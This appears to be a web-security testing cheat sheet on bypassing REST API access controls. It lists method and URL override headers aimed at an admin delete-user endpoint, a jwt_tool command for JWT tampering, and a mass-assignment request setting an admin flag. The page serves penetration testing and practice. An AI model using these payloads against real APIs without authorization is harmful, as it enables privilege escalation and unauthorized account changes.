REST API - Bypasses and Privilege Escalations

REST API security testing

Methodology

Bypassing API filter and ACL by rewriting HTTP methods an URLs

X-HTTP-Method: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method-Override: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method: PATCH
X-HTTP-Method: PATCH
X-Method-Override: PATCH
X-Original-Method: PATCH
X-Original-URL: /admin/deleteUser
X-Rewrite-URL: /admin/deleteUser

Access Admin Interface

using HTTP headers rewriting trusted client's IP address or Hosts.

JWT Access Token Tampering

JWT Editor : Burp plugin

Available in BApp store, explore also advanced JWT header attacks https://portswigger.net/web-security/jwt#jwt-header-parameter-injections

JWT Tool

https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology

python3 ./jwt_tool.py -M pb -t http:/URL:5001/api/method  -pd "{\"propertyId\": 29}" -rh "Authorization: Bearer <TOKEN>" -rh "Content-Type: text/json"

Mass Assignment

Observer object properties and try to set them (search for hidden parameters PARAMMINER)

POST /api/user/create
Host: server
Content-Type: application/json

{ "admin": true}

API Tester

Vulnerable API Project to practice with

Last updated

Was this helpful?